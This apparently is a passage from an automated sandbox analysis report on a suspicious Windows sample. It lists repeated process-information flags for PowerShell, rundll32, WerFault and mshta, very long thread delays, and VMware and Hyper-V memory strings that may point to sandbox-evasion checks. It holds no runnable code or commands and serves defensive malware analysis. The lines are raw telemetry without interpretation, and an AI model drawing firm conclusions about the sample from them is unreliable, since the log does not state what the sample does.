Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5815Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3942Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4087
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5651
Source: C:\Windows\System32\loaddll64.exe TID: 5780Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7596Thread sleep time: -18446744073709540s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7772Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7920Thread sleep count: 4087 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7908Thread sleep count: 5651 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7952Thread sleep time: -19369081277395017s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\loaddll64.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: Amcache.hve.10.drBinary or memory string: VMware
Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
Source: rundll32.exe, 0000000C.00000002.2042532242.000001E645BE3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWz
